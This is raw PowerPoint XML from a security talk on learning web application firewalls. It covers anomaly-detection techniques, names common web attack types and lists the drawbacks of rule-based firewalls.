              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>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parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> as a single one)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Improve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>structural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>inference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (B-W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>  form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time-consuming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may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> be a problem in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>production</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>enviroments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> with high </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Improve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>support</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> for a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>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try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>utilse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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28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4400" dirty="0" smtClean="0"/>
              <a:t>THANK YOU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8143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Introduction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4456"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Unfortunately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>governmental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>websites</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>applications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no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>exception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 smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>details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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> for sale on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>black</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> market.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81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56" y="260648"/>
            <a:ext cx="531495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681544" y="6023273"/>
            <a:ext cx="189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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="1200" dirty="0" smtClean="0"/>
              <a:t>: blog.imperva.com)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6259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Web Application Architecture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693864" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4241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100" dirty="0" err="1" smtClean="0"/>
              <a:t>Common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" smtClean="0"/>
              <a:t> Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>Methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>Against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="3100" dirty="0" smtClean="0"/>
              <a:t> Web Applications</a:t>
            </a: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16424"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>especially</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Injections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Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>tampering</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Forceful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>browsing</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL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6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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>evels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997886" cy="4104456"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28119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Rule-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> Web Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Firewalls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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Problems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>disadvantages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Difficulties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>configuring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> a WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Duplication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>protection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>rules</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>Constant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>adjustment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" smtClean="0"/>
              <a:t> of WAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" dirty="0" err="1" smtClean="0"/>
              <a:t>rules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77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WASP Presentation Template">
  <a:themeElements>
    <a:clrScheme name="OWASP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WASP Presentatio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WASP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OWASP Presentation Template</Template>
  <TotalTime>33</TotalTime>
  <Words>1308</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>242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OWASP Presentation Template</vt:lpstr>
      <vt:lpstr>Learning Web Application Firewall – Benefits and Caveats</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Application Architecture</vt:lpstr>
      <vt:lpstr>Common Attack Methods Against Web Applications</vt:lpstr>
      <vt:lpstr>Security Levels</vt:lpstr>
      <vt:lpstr>Rule-based Web Application Firewalls</vt:lpstr>
      <vt:lpstr>Learning Web Application Firewall</vt:lpstr>
      <vt:lpstr>Learning Patterns</vt:lpstr>
      <vt:lpstr>Learning Patterns</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>WAF Architecture</vt:lpstr>
      <vt:lpstr>Length of Parameter Values</vt:lpstr>
      <vt:lpstr>Length of Parameter Values</vt:lpstr>
      <vt:lpstr>Length of Parameter Values</vt:lpstr>
      <vt:lpstr>Length of Parameter Values</vt:lpstr>
      <vt:lpstr>Belonging to Predefined Classes</vt:lpstr>
      <vt:lpstr>Belonging to Predefined Classess</vt:lpstr>
      <vt:lpstr>The Character Distribution</vt:lpstr>
      <vt:lpstr>The Character Distribution</vt:lpstr>
      <vt:lpstr>The Character Distribution</vt:lpstr>
      <vt:lpstr>The Character Distribution</vt:lpstr>
      <vt:lpstr>Parameter Structural Inference</vt:lpstr>
      <vt:lpstr>Ergodic HMM</vt:lpstr>
      <vt:lpstr>Parameter structural inference</vt:lpstr>
      <vt:lpstr>Parameter Structural Inference</vt:lpstr>
      <vt:lpstr>Anomaly Detection</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Types of Attacks Found by WAF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Plan - Strawman</dc:title>
  <dc:subject>Application Security</dc:subject>
  <dc:creator>Jeff Williams</dc:creator>
  <cp:keywords>Application Security</cp:keywords>
  <dc:description>http://www.owasp.org</dc:description>
  <cp:lastModifiedBy>Wojciech Dworakowski</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-03-04T17:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-09-23T06:41:43Z</dcterms:modified>
  <cp:category>Application Security</cp:category>
  <cp:contentStatus/>
</cp:coreProperties>
</file>